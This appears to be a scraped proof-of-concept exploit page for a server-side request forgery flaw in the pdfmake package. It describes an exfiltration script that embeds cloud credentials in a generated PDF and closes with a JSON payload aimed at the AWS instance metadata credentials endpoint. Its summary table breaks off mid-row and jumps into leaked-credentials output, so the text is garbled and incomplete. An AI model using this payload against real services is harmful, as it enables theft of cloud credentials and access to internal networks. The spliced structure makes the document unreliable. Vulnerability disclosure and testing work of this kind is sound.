## https://sploitus.com/exploit?id=767AA85A-5D36-5F38-BB40-2F01742E21DC
# pdfmake SSRF Vulnerability PoC
## Vulnerability Summary
| Field | Value |
|-------|-------|
| Package | pdfmake |
| Version | >= 0.3.0-beta.2, >> CREDENTIALS LEAKED! <<<
```
This proves the vulnerable server made an outbound request to our controlled endpoint.
### Full Read SSRF (`npm run exfiltrate`)
The attack script generates `exfiltrated.pdf`. Open it in any PDF viewer and the AWS credentials JSON is embedded as a file attachment (`metadata.json`). This proves full data exfiltration, not just blind SSRF. The attacker gets the actual response body back inside the PDF.
## Real-World Impact
1. **AWS/GCP/Azure Credential Theft** - Access cloud metadata endpoints
2. **Internal Network Access** - Reach internal services
3. **Port Scanning** - Enumerate internal infrastructure
4. **Auth Bypass** - Custom headers to bypass authentication
## Attack Payload
```json
{
"content": ["Hello"],
"images": {
"x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
}
```